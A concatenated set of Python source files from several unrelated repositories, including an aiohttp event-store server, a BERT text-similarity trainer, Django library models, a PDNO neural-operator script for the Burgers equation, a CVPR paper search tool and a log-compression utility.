def __init__(self, store):
self.__store = store
async def add(self, request):
await self.__store.append(await get_event_from_request(request))
return aiohttp.web.Response(text='Added')
async def __consume(self, ws, start=None):
collection = self.__store
if start:
collection = collection[start:]
async for event in collection:
try:
await ws.send_json(event.dict())
except Exception:
raise asyncio.CancelledError()
async def websocket(self, req):
ws = aiohttp.web.WebSocketResponse()
await ws.prepare(req)
task = asyncio.ensure_future(self.__consume(ws, req.match_info.get('start', None)))
try:
async for msg in ws:
pass
except Exception as e:
pass
await ws.close()
task.cancel()
logger.info("Closing websocket session for %s", task)
return ws
async def stream(self, request):
output = []
async for event in self.__store[get_stream_id_from_request(request)]:
output.append(dict(event))
return aiohttp.web.json_response(output)
```
#### File: estore/server/web.py
```python
import functools
import aiohttp.web
class Application(aiohttp.web.Application):
def __init__(self, name, *args, **kwargs):
super(Application, self).__init__(*args, **kwargs)
self.__name = name
self.__children={}
def get_name(self):
return self.__name
def add_get(self, path, callback, **options):
if not 'name' in options:
options['name'] = callback.__name__
self.add_routes([aiohttp.web.get(path, callback, **options)])
def add_post(self, path, callback, **options):
if not 'name' in options:
options['name'] = callback.__name__
self.add_routes([aiohttp.web.post(path, callback, **options)])
def add_view(self, path, callback, **options):
if not 'name' in options:
options['name'] = callback.__name__
self.add_routes([aiohttp.web.view(path, callback, **options)])
def add_subapp(self, path, app):
super(Application, self).add_subapp(path, app)
name = app.get_name()
if name:
self.__children[name] = app
def url_for(self, name, *args, **kwargs):
if '.' in name:
child_name, rest = name.split('.', 1)
return self.__children[child_name].url_for(rest, *args, **kwargs)
return str(self.router[name].url_for(*args, **kwargs))
class Response:
def __init__(self, env):
self.__env = env
def redirect(self):
pass
async def render_template(self, name, **kwargs):
template = self.__env.get_template(name)
return aiohttp.web.Response(
text=await template.render_async(**kwargs), content_type='text/html')
def unpack_match_info(f):
@functools.wraps(f)
def wrapper(obj, request):
return f(obj, request, **request.match_info)
return wrapper
``` |
{
"source": "jinxulin/chinese-text2vec",
"score": 2
} |
#### File: chinese-text2vec/src/train.py
```python
import argparse
import os
import pandas as pd
import torch
from datetime import datetime
from data import SentencePairDataset
from model import *
from runner import *
from tqdm import tqdm
from torch.utils.data import DataLoader
from transformers import BertConfig, BertModel, BertTokenizer
def set_args():
parser = argparse.ArgumentParser('--使用transformers实现cosent')
parser.add_argument('--train_data_path', default='../data/train.csv', type=str, help='训练数据集')
parser.add_argument('--dev_data_path', default='../data/dev_test.csv', type=str, help='测试数据集')
parser.add_argument('--pretrain_dir', default='../pretrain/', type=str, help='预训练模型模型位置')
parser.add_argument('--train_batch_size', default=16, type=int, help='训练批次的大小')
parser.add_argument('--dev_batch_size', default=16, type=int, help='验证批次的大小')
parser.add_argument('--output_dir', default='../output/', type=str, help='模型输出目录')
parser.add_argument('--num_epochs', default=10, type=int, help='训练几轮')
parser.add_argument('--learning_rate', default=2e-5, type=float, help='学习率大小')
parser.add_argument('--model', default='cosent', type=str, help='模型名称,可以是cosent或sbert')
return parser.parse_args()
def run(args):
# 预训练模型加载
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
tokenizer = BertTokenizer.from_pretrained(os.path.join(args.pretrain_dir, 'vocabs.txt'), local_files_only=True, do_lower_case=True)
pretrain_config = BertConfig.from_pretrained(os.path.join(args.pretrain_dir, 'config.json'))
pretrain_model = BertModel.from_pretrained(args.pretrain_dir, config=pretrain_config)
# 模型初始化
model = Model(pretrain_model)
model.to(device)
# 数据加载
df_train = pd.read_csv(args.train_data_path, sep='\t')
df_dev = pd.read_csv(args.dev_data_path, sep='\t')
train_data = SentencePairDataset(tokenizer, df_train)
train_loader = DataLoader(train_data, shuffle=True, batch_size=args.train_batch_size)
dev_data = SentencePairDataset(tokenizer, df_dev)
dev_loader = DataLoader(dev_data, shuffle=False, batch_size=args.dev_batch_size)
# 优化器设置
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [{
'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
'weight_decay':0.01
},{
'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
'weight_decay':0.0
}]
optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate)
scaler = amp.GradScaler()
for epoch in range(args.num_epochs):
start_time = time.time()
running_loss = 0
batch_time_avg = 0
tqdm_batch_iterator = tqdm(train_loader)
for batch_index, batch in enumerate(tqdm_batch_iterator):
model.zero_grad()
if torch.cuda.is_available():
batch = tuple(t.cuda() for t in batch)
s1_input_ids, s2_input_ids, label = batch
with amp.autocast():
s1_vec, s2_vec = model(s1_input_ids, s2_input_ids)
loss = cosent_loss(s1_vec, s2_vec, label)
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
else:
s1_input_ids, s2_input_ids, label = batch
s1_vec, s2_vec = model(s1_input_ids, s2_input_ids)
loss = cosent_loss(s1_vec, s2_vec, label)
loss.backward()
optimizer.step()
running_loss += loss.item()
batch_time_avg = time.time() - start_time
description = "Running metrics on average. time: {:.4f}s, loss: {:.4f}".format(batch_time_avg / (batch_index + 1), running_loss / (batch_index + 1))
tqdm_batch_iterator.set_description(description)
print("* Validation for epoch {}:".format(epoch))
epoch_time, epoch_loss, epoch_accuracy, epoch_auc, epoch_pearsonr = validate(model, dev_loader)
result_info = "Valid metrics. time: {:.4f}s, loss: {:.4f}, accuracy: {:.4f}%, auc: {:.4f}, pearsonr: {:.4f}\n".format(epoch_time, epoch_loss, (epoch_accuracy * 100), epoch_auc, epoch_pearsonr)
print(result_info)
torch.save({"epoch": epoch,
"model": model.state_dict(),
"valid_losses": epoch_loss},
os.path.join(args.output_dir, "model_{0}.pth.tar".format(epoch)))
with open("{0}/history.txt".format(args.output_dir), "a") as history:
history.write(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + f" epoch {epoch}: " + result_info)
if __name__ == "__main__":
# 参数设置
args = set_args()
run(args)
``` |
{
"source": "jinxy17/library-management",
"score": 3
} |
#### File: library-management/Managers/models.py
```python
from django.db import models
from Users.models import AppComment
class Manager(models.Model):
''' Models for Manager '''
account = models.CharField(unique=True, max_length=20)
password = models.CharField(max_length=20)
def __str__(self):
return self.account
class ManagerResponse(models.Model):
''' Models for Manager Response to appcomments'''
manager = models.ForeignKey(Manager, related_name="responses", on_delete=models.CASCADE)
comment = models.CharField(max_length=1000)
timestamp = models.DateTimeField(auto_now_add=True)
response = models.OneToOneField(AppComment, on_delete=models.CASCADE)
``` |
{
"source": "JinY0ung-Shin/PDNO",
"score": 2
} |
#### File: JinY0ung-Shin/PDNO/Burgers_1d.py
```python
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt
from utils import MatReader, rel_error, UnitGaussianNormalizer
from tqdm import tqdm
import sys
import argparse
import os
import shutil
torch.manual_seed(0)
np.random.seed(0)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
class Net(nn.Module):
def __init__(self, d_in, d_out, activation='gelu', num_layer=1, d_hidden=64):
super().__init__()
self.linear_in = nn.Linear(d_in, d_hidden)
self.hidden = nn.ModuleList([nn.Linear(d_hidden, d_hidden) for i in range(num_layer)])
self.linear_out = nn.Linear(d_hidden, d_out)
act = activation.lower()
if act=='tanh':
self.activation=torch.tanh
if act=='gelu':
self.activation = F.gelu
def forward(self, x):
out = self.linear_in(x)
out = self.activation(out)
for layer in self.hidden:
out = layer(out)
out = self.activation(out)
return self.linear_out(out)
class SpectralConv1d_fast(nn.Module):
def __init__(self, in_channels, out_channels, activation, num_layer, d_hidden, net_out, k_max=None):
super(SpectralConv1d_fast, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.net_out = net_out
self.k_max = k_max
self.scale = (1 / (in_channels * out_channels))
self.net_real = Net(d_in=1, d_out=in_channels*out_channels, activation=activation, num_layer=num_layer, d_hidden=d_hidden)
self.net_imag= Net(d_in=1, d_out=in_channels*out_channels, activation=activation, num_layer=num_layer, d_hidden=d_hidden)
if self.net_out:
self.net_out = Net(d_in=1, d_out=in_channels*out_channels, activation=activation,
num_layer=num_layer, d_hidden=d_hidden)
def _weights(self, shape):
grid = self.get_grid_freq(shape)
out_real = self.net_real(grid).permute(1, 0).contiguous()
out_imag = self.net_imag(grid).permute(1, 0).contiguous()
out_real = out_real.reshape(self.out_channels, self.in_channels, *(grid.shape[:1]))
out_imag = out_imag.reshape(self.out_channels, self.in_channels, *(grid.shape[:1]))
_out = torch.complex(out_real, out_imag)
if self.k_max:
out = _out.new_zeros(self.out_channels, self.in_channels, shape[0]//2+1)
out[:,:,:self.k_max] = _out
return out
else:
return _out
def _weights_out(self, shape):
grid = self.get_grid(shape)
out = self.net_out(grid).permute(1, 0).contiguous()
out = out.reshape(self.out_channels, self.in_channels, shape[0])
return out
def cal_weights(self, shape):
self.set_shape(shape)
self.weights = self._weights(shape)
if self.net_out:
self.weights_out = self._weights_out(shape)
def set_shape(self, shape):
self.shape = shape
def forward(self, x):
batchsize = x.shape[0]
shape = x.shape[-1:]
self.cal_weights(shape)
x_ft = torch.fft.rfft(x)
out_ft = x_ft.unsqueeze(dim=1)*self.weights
if self.net_out:
x = torch.fft.irfft(out_ft, n=(x.size(-1)))
x = x*self.weights_out
x = x.sum(dim=2)
else:
out_ft = out_ft.sum(dim=2)
x = torch.fft.irfft(out_ft, n=(x.size(-1)))
return x
def get_grid(self, shape):
mx = shape[0]
mx = torch.linspace(0, 1, mx)
mx = mx.to(device)
return mx.unsqueeze(dim=-1)
def get_grid_freq(self, shape):
mx = shape[0]
mx = torch.fft.rfftfreq(mx, d=1)
if self.k_max:
mx = mx[:self.k_max]
mx = mx.to(device)
return mx.unsqueeze(dim=-1)
class Burgers(nn.Module):
def __init__(self, width, symbol_act, num_layer=2, num_hidden=32, net_out=True, k_max=None):
super(Burgers, self).__init__()
self.width = width
self.fc0 = nn.Linear(2, self.width)
self.conv0 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.conv1 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.conv2 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.conv3 = SpectralConv1d_fast(self.width, self.width, num_layer=num_layer, d_hidden=num_hidden, activation= symbol_act, net_out=net_out, k_max=k_max)
self.w0 = nn.Conv1d(self.width, self.width, 1)
self.w1 = nn.Conv1d(self.width, self.width, 1)
self.w2 = nn.Conv1d(self.width, self.width, 1)
self.w3 = nn.Conv1d(self.width, self.width, 1)
self.fc1 = nn.Linear(self.width, 128)
self.fc2 = nn.Linear(128, 1)
def forward(self, x):
grid = self.get_grid(x.shape, x.device)
x = torch.cat((x, grid), dim=-1)
x = self.fc0(x)
x = x.permute(0, 2, 1).contiguous()
x1 = self.conv0(x)
x2 = self.w0(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv1(x)
x2 = self.w1(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv2(x)
x2 = self.w2(x)
x = x1 + x2
x = F.gelu(x)
x1 = self.conv3(x)
x2 = self.w3(x)
x = x1 + x2
x = x.permute(0, 2, 1).contiguous()
x = self.fc1(x)
x = F.gelu(x)
x = self.fc2(x)
return x
def get_grid(self, shape, device):
batchsize, size_x = shape[0], shape[1]
gridx = torch.tensor(np.linspace(0, 1, size_x), dtype=torch.float)
gridx = gridx.reshape(1, size_x, 1).repeat([batchsize, 1, 1])
return gridx.to(device)
def get_args(argv=None):
parser = argparse.ArgumentParser(description = 'Put your hyperparameters')
parser.add_argument('name', type=str, help='experiments name')
parser.add_argument('--batch', default=20, type=int, help = 'batch size')
parser.add_argument('--epochs', default=1000, type=int, help = 'Number of Epochs')
parser.add_argument('--lr', default=5e-3, type=float, help='learning rate')
parser.add_argument('--wd', default=0, type=float, help='weight decay')
parser.add_argument('--step_size', default=100, type=int, help='scheduler step size')
parser.add_argument('--gamma', default=0.5, type=float, help='scheduler factor')
parser.add_argument('--multgpu', action='store_true', help='whether multiple gpu or not')
parser.add_argument('--width', default=64, type=int, help='number of channel')
parser.add_argument('--num_layer', default=2, type=int, help='number of hidden layer of implicit network')
parser.add_argument('--num_hidden', default=64, type=int, help='dimension of hidden layer of implicit network')
parser.add_argument('--sub', default=32, type=int, help='sub sampling rate')
parser.add_argument('--act', default='tanh', type=str, help='activation')
parser.add_argument('--load_path', default=None, type=str, help='path of directory to resume the training')
parser.add_argument('--net_out', action='store_false', help='use symbol network with a(x) or not')
parser.add_argument('--k_max', default=None, type=int, help='maximum mode')
return parser.parse_args(argv)
if __name__=="__main__":
args = get_args()
print(args)
NAME = args.name
if args.load_path is None:
PATH = 'results/{}/'.format(sys.argv[0][:-3])
if not os.path.exists(PATH):
os.mkdir(PATH)
PATH = os.path.join(PATH, NAME)
os.mkdir(PATH)
else:
epoch_add = args.epochs
PATH = args.load_path
args = torch.load(os.path.join(args.load_path, 'args.bin'))
args.load_path = PATH
args.name = NAME
PATH = os.path.join(PATH, NAME)
os.mkdir(PATH)
args.epochs+=epoch_add
shutil.copy(sys.argv[0], os.path.join(PATH, 'code.py'))
if args.multgpu:
num_gpu = torch.cuda.device_count()
else:
num_gpu = 1
lr = args.lr
wd = args.wd
batch_size = args.batch
EPOCHS = args.epochs
step_size = args.step_size
gamma = args.gamma
width = args.width
num_layer = args.num_layer
num_hidden = args.num_hidden
sub = args.sub## sub sampling rate
symbol_act = args.act
net_out = args.net_out
k_max = args.k_max
torch.save(args, os.path.join(PATH, 'args.bin'))
ntrain = 1000
ntest = 100
TRAIN_PATH = 'data/burgers_data_R10.bin'
TEST_PATH = 'data/burgers_data_R10.bin'
h = 2**13 // sub # total grid size divided by the subsampling rate
s = h
data = torch.load(TRAIN_PATH)
x_train, y_train = data['a'][:ntrain,::sub], data['u'][:ntrain,::sub]
data = torch.load(TEST_PATH)
x_test, y_test = data['a'][-ntest:,::sub], data['u'][-ntest:,::sub]
x_train = x_train.unsqueeze(dim=-1)
x_test = x_test.unsqueeze(dim=-1)
trainset = torch.utils.data.TensorDataset(x_train, y_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)
testset = torch.utils.data.TensorDataset(x_test, y_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False)
model = Burgers(width=width, symbol_act=symbol_act, num_hidden=num_hidden, num_layer=num_layer, net_out=net_out, k_max=k_max).to(device)
if num_gpu> 1:
print("Let's use", num_gpu, "GPUs!")
model = nn.DataParallel(model).cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=wd)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma)
start_epoch = 0
if args.load_path is not None:
model.load_state_dict(torch.load(os.path.join(args.load_path, 'weight.bin')))
checkpoint = torch.load(os.path.join(args.load_path, 'checkpoint.bin'))
optimizer.load_state_dict(checkpoint['optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
start_epoch = checkpoint['epoch']
print("Load previous checkpoints from {}".format(args.load_path))
print("Resume from %d epoch (reamining %d epochs)"%(start_epoch, EPOCHS-start_epoch))
train_rel = []
test_rel = []
pbar = tqdm(total=EPOCHS-start_epoch, file=sys.stdout)
for epoch in range(1+start_epoch, EPOCHS+1):
model.train()
train_l2 = 0
for a, u in trainloader:
optimizer.zero_grad()
a, u = a.to(device), u.to(device)
u_pred = model(a).squeeze()
loss = rel_error(u_pred, u).sum()
loss.backward()
optimizer.step()
l2_full = rel_error(u_pred, u).sum()
train_l2 += loss.item()
train_rel.append(train_l2/ntrain)
model.eval()
with torch.no_grad():
test_l2=0
for a, u in testloader:
optimizer.zero_grad()
a, u = a.to(device), u.to(device)
u_pred = model(a).squeeze()
loss = rel_error(u_pred, u).sum()
test_l2 += loss.item()
test_rel.append(test_l2/ntest)
pbar.set_description("###### Epoch : %d, Loss_train : %.4f, Loss_test : %.4f ######"%(epoch, train_rel[-1], test_rel[-1]))
scheduler.step()
pbar.update()
torch.save(model.state_dict(),os.path.join(PATH, 'weight.bin'))
torch.save({'train_rel':train_rel, 'test_rel':test_rel}, os.path.join(PATH, 'loss.bin'))
torch.save({'epoch':epoch,
'optimizer':optimizer.state_dict(),
'scheduler':scheduler.state_dict()}, os.path.join(PATH, 'checkpoint.bin'))
```
#### File: JinY0ung-Shin/PDNO/utils.py
```python
import torch
from torch.fft import *
import numpy as np
import scipy.io
import h5py
import torch.nn as nn
import operator
from functools import reduce
from functools import partial
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
class MatReader(object):
def __init__(self, file_path, to_torch=True, to_cuda=False, to_float=True):
super(MatReader, self).__init__()
self.to_torch = to_torch
self.to_cuda = to_cuda
self.to_float = to_float
self.file_path = file_path
self.data = None
self.old_mat = None
self._load_file()
def _load_file(self):
try:
self.data = scipy.io.loadmat(self.file_path)
self.old_mat = True
except:
self.data = h5py.File(self.file_path)
self.old_mat = False
def load_file(self, file_path):
self.file_path = file_path
self._load_file()
def read_field(self, field):
x = self.data[field]
if not self.old_mat:
x = x[()]
x = np.transpose(x, axes=range(len(x.shape) - 1, -1, -1))
if self.to_float:
x = x.astype(np.float32)
if self.to_torch:
x = torch.from_numpy(x)
if self.to_cuda:
x = x.cuda()
return x
def set_cuda(self, to_cuda):
self.to_cuda = to_cuda
def set_torch(self, to_torch):
self.to_torch = to_torch
def set_float(self, to_float):
self.to_float = to_float
def rfft2_feature(x, n_trun=12):
"""
x : torch.tensor shape of (..., W, W)
"""
w = x.size(-1)
x_feat = rfft2(x)
real, imag = x_feat.real, x_feat.imag
real, imag = real.T[list(range(n_trun)), :], imag.T[list(range(n_trun)), :]
real = real[:, list(range(n_trun)) + list(range(w-1, w-1-n_trun, -1))]
imag = imag[:, list(range(n_trun)) + list(range(w-1, w-1-n_trun, -1))]
return real.T, imag.T
def rel_error(x, _x):
"""
<ARGS>
x : torch.Tensor shape of (B, *)
_x : torch.Tensor shape of (B, *)
<RETURN>
out :torch.Tensor shape of (B), batchwise relative error between x and _x : (||x-_x||_2/||_x||_2)
"""
if len(x.shape)==1:
x = x.reshape(1, -1)
_x = _x.reshape(1, -1)
else:
B = x.size(0)
x, _x = x.reshape(B, -1), _x.reshape(B, -1)
return torch.norm(x - _x, 2, dim=1) / torch.norm(_x, 2, dim=1)
class LpLoss(object):
def __init__(self, d=2, p=2, size_average=True, reduction=True):
super(LpLoss, self).__init__()
#Dimension and Lp-norm type are postive
assert d > 0 and p > 0
self.d = d
self.p = p
self.reduction = reduction
self.size_average = size_average
def abs(self, x, y):
num_examples = x.size()[0]
#Assume uniform mesh
h = 1.0 / (x.size()[1] - 1.0)
all_norms = (h**(self.d/self.p))*torch.norm(x.view(num_examples,-1) - y.view(num_examples,-1), self.p, 1)
if self.reduction:
if self.size_average:
return torch.mean(all_norms)
else:
return torch.sum(all_norms)
return all_norms
def rel(self, x, y):
num_examples = x.size()[0]
diff_norms = torch.norm(x.reshape(num_examples,-1) - y.reshape(num_examples,-1), self.p, 1)
y_norms = torch.norm(y.reshape(num_examples,-1), self.p, 1)
if self.reduction:
if self.size_average:
return torch.mean(diff_norms/y_norms)
else:
return torch.sum(diff_norms/y_norms)
return diff_norms/y_norms
def __call__(self, x, y):
return self.rel(x, y)
# normalization, pointwise gaussian
class UnitGaussianNormalizer(object):
def __init__(self, x, eps=0.00001):
super(UnitGaussianNormalizer, self).__init__()
# x could be in shape of ntrain*n or ntrain*T*n or ntrain*n*T
self.mean = torch.mean(x, 0)
self.std = torch.std(x, 0)
self.eps = eps
def encode(self, x):
x = (x - self.mean) / (self.std + self.eps)
return x
def decode(self, x, sample_idx=None):
if sample_idx is None:
std = self.std + self.eps # n
mean = self.mean
else:
if len(self.mean.shape) == len(sample_idx[0].shape):
std = self.std[sample_idx] + self.eps # batch*n
mean = self.mean[sample_idx]
if len(self.mean.shape) > len(sample_idx[0].shape):
std = self.std[:,sample_idx]+ self.eps # T*batch*n
mean = self.mean[:,sample_idx]
# x is in shape of batch*n or T*batch*n
x = (x * std) + mean
return x
def cuda(self):
self.mean = self.mean.cuda()
self.std = self.std.cuda()
def cpu(self):
self.mean = self.mean.cpu()
self.std = self.std.cpu()
``` |
{
"source": "jiny2001/CVPR_paper_search_tool",
"score": 3
} |
#### File: jiny2001/CVPR_paper_search_tool/find_paper_by_words.py
```python
import argparse
from model.paper2vec import Paper2Vec
parser = argparse.ArgumentParser()
parser.add_argument('keywords', nargs='+', help='keywords for search')
parser.add_argument('-c', '--count', default=5, type=int, nargs='?', help='max num of papers to find')
parser.add_argument('--model_dir', default='data', type=str, nargs='?', help='directory for data')
args = parser.parse_args()
def main(args):
p2v = Paper2Vec(model_dir=args.model_dir)
p2v.load_paper_vectors()
print('\nKeyword(s):', args.keywords)
results = p2v.find_by_keywords(args.keywords, args.count)
if len(results) <= 0:
print('No papers found.')
exit(0)
print('\n%d Papers found ---' % len(results))
for result in results:
# result[0] contains paper id, result[1] contains matching score (larger is better)
print('ID:%d, Score:%d, [ %s ]' % (result[0], result[1], p2v.paper[result[0]].title))
print('Abstract URL:%s' % p2v.paper[result[0]].abstract_url)
print('PDF URL:%s\n' % p2v.paper[result[0]].pdf_url)
if __name__ == '__main__':
main(args)
```
#### File: CVPR_paper_search_tool/model/helper.py
```python
import os
import pickle
from collections import Counter
import numpy as np
def make_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
# Read lines into a list of strings.
def read_lines(filename):
with open(filename) as f:
content = f.readlines()
return [x.strip() for x in content]
# Read words into a list of strings.
def read_words(filename):
with open(filename) as f:
words = f.read().split()
return words
def save_object(folder, name, obj):
with open(folder + name + '.pkl', 'wb+') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_object(folder, name):
with open(folder + name + '.pkl', 'rb') as f:
return pickle.load(f)
def merge_dictionary(dict1, dict2):
dict1_counter = Counter(dict1)
dict2_counter = Counter(dict2)
merged_dictionary = dict1_counter + dict2_counter
return dict(merged_dictionary)
def arg_sort(values, count=0, descending=False):
if count <= 0:
count = len(values)
# # use argpartition() to efficiently sort (if np is latest enough)
# if descending:
# indices = np.argpartition(-values, count)
# else:
# indices = np.argpartition(values, count)
# # since indices is not sorted (because of the partial sort), sort again
# new_scores = np.zeros([count], dtype=int)
# for i in range(0, count):
# if descending:
# new_scores[i] = -values[indices[i]]
# else:
# new_scores[i] = values[indices[i]]
#
# new_indices = np.argsort(new_scores)
#
# ids = np.zeros(count, dtype=int)
# for i in range(0, count):
# ids[i] = int(indices[int(new_indices[i])])
if descending:
indices = np.argsort(-values)
else:
indices = np.argsort(values)
ids = np.zeros(count, dtype=int)
for i in range(0, count):
ids[i] = int(indices[i])
return ids
``` |
{
"source": "jiny419/self-critical.pytorch",
"score": 2
} |
#### File: captioning/utils/uncertainty_utils.py
```python
import torch
def get_entropy(probs, dim=-1):
# probs: arbitrary tensor, dimension dim contains the probabilities
return -torch.sum(probs.log() * probs, dim=dim)
def calculate_uncertainties(candidate_probs, candidate_weights):
# candidate_probs: (batch_size, vocab_size, num_candidates)
# calculate average mean prediction
probs = candidate_probs.mul(candidate_weights).div(candidate_weights.sum()).sum(-1)
# total entropy
total = get_entropy(probs) # size: (batch_size,)
# aleatoric part
aleatoric = get_entropy(candidate_probs, dim=1).mul(candidate_weights).div(candidate_weights.sum()).sum(-1)
# epistemic part
epistemic = total - aleatoric
return aleatoric, epistemic
``` |
{
"source": "JinYang88/LogZip",
"score": 2
} |
#### File: src/logzip/logzip.py
```python
import sys
sys.path.append("../logzip/")
import os
import glob
import time
import shutil
import subprocess
from logparser import Drain
def boolean_string(s):
if s not in {'False', 'True'}:
raise ValueError('Not a valid boolean string')
return s == 'True'
def get_FileSize(filePath, unit="kb"):
fsize = os.path.getsize(filePath)
if unit == "mb":
fsize = fsize/float(1024*1024)
if unit == "kb":
fsize = fsize/float(1024)
return round(fsize, 2)
def zip_file(filepath, outdir, log_format, template_file="", n_workers=2,
level=3, lossy=False, top_event=2000, kernel="gz", compress_single=False,
report_file="./report.csv"):
time_start = time.time()
# new tmp dirs
logname = os.path.basename(filepath)
timemark = time.strftime('%Y%m%d-%H%M%S', time.localtime(time.time()))
tmp_dir = os.path.join(outdir, logname + "_tmp_" + timemark)
print("Tmp files are in {}".format(tmp_dir))
if os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir)
if not os.path.isdir(tmp_dir):
os.makedirs(tmp_dir)
if not template_file:
"""
0. sampling
"""
line_num = subprocess.check_output("wc -l {}".format(filepath), shell=True)
line_num = int(line_num.split()[0])
sample_num = 50000
sample_file_path = filepath + ".sample"
try:
subprocess.check_output("gshuf -n{} {} > {}".format(sample_num, filepath,
sample_file_path), shell=True)
except:
subprocess.check_output("shuf -n{} {} > {}".format(sample_num, filepath,
sample_file_path), shell=True)
"""
1. get template file
"""
st = 0.5 # Similarity threshold
depth = 4 # Depth of all leaf nodes
regex = [
r'blk_(|-)[0-9]+' , # block id
r'(/|)([0-9]+\.){3}[0-9]+(:[0-9]+|)(:|)', # IP
r'(?<=[^A-Za-z0-9])(\-?\+?\d+)(?=[^A-Za-z0-9])|[0-9]+$', # Numbers
]
parse_begin_time = time.time()
parser = Drain.LogParser(log_format, outdir=tmp_dir, depth=depth, st=st, rex=regex)
templates = parser.parse(sample_file_path)
os.remove(sample_file_path)
parse_end_time = time.time()
template_file = os.path.join(tmp_dir, "log_templates.csv")
with open(template_file, "w") as fw:
[fw.write(item+"\n") for item in templates]
print("Parser cost [{:.3f}s]".format(parse_end_time-parse_begin_time))
# split files
kb_per_chunk = int(get_FileSize(filepath) // n_workers) + 1
cmd = "split -b {}k {} {}".format(kb_per_chunk, filepath, os.path.join(tmp_dir, f"{logname}_"))
subprocess.call(cmd, stderr=subprocess.STDOUT, shell=True)
# run subprocesses
processes = []
for idx, file in enumerate(sorted(glob.glob(os.path.join(tmp_dir, f"{logname}_*")))):
script_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "zipper_longgest.py")
per_tmp_dir = os.path.join(tmp_dir, str(idx))
cmd = ('python {} --file {} --log_format "{}" --level {} --lossy {} --template_file {}'+ \
' --tmp_dir {} --out_dir {} --compress_single {} --n_workers {}') \
.format(script_path, file, log_format, level, lossy, template_file,
per_tmp_dir, per_tmp_dir,
compress_single, n_workers)
print(cmd)
processes.append(subprocess.Popen(cmd, stderr=subprocess.STDOUT, shell=True))
[p.wait() for p in processes]
compressed_size = 0
for idx in range(len(processes)):
sub_outfile = glob.glob(os.path.join(tmp_dir, str(idx), "*logzip*"))[0]
dst = os.path.join(outdir, os.path.basename(sub_outfile) + f".{idx+1}of{len(processes)}")
shutil.move(sub_outfile, dst)
compressed_size += get_FileSize(dst, "mb")
[os.remove(chunk) for chunk in glob.glob(os.path.join(tmp_dir, f"{logname}_*"))]
original_size = get_FileSize(filepath, "mb")
compress_ratio = round(original_size / compressed_size, 2)
time_end = time.time()
total_time_taken = time_end - time_start
firstline = True
if os.path.isfile(report_file):
firstline = False
with open(report_file, "a+") as fw:
if firstline:
fw.write("timemark,logname,original_size,compressed_size,compress_ratio,time_taken,n_workers,compress_single\n")
fw.write(f"{timemark},{logname},{original_size},{compressed_size},{compress_ratio},{total_time_taken},{n_workers},{compress_single}\n")
if __name__ == "__main__":
logfile = "../../logs/HDFS_2k.log" # Raw log file."
outdir = "../../zip_out/" # Output directory, if not exists, it will be created.
log_format = '<Date> <Time> <Pid> <Level> <Component>: <Content>' # Log format to extract fields.
n_workers = 3
level = 3
top_event = 2000
kernel = "gz"
compress_single = True
lossy = True
report_file = "./report.csv"
template_file = ""
zip_file(logfile, outdir, log_format,
template_file=template_file,
n_workers=n_workers,
level=level,
top_event=top_event,
kernel=kernel,
lossy=lossy,
compress_single=compress_single,
report_file=report_file)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.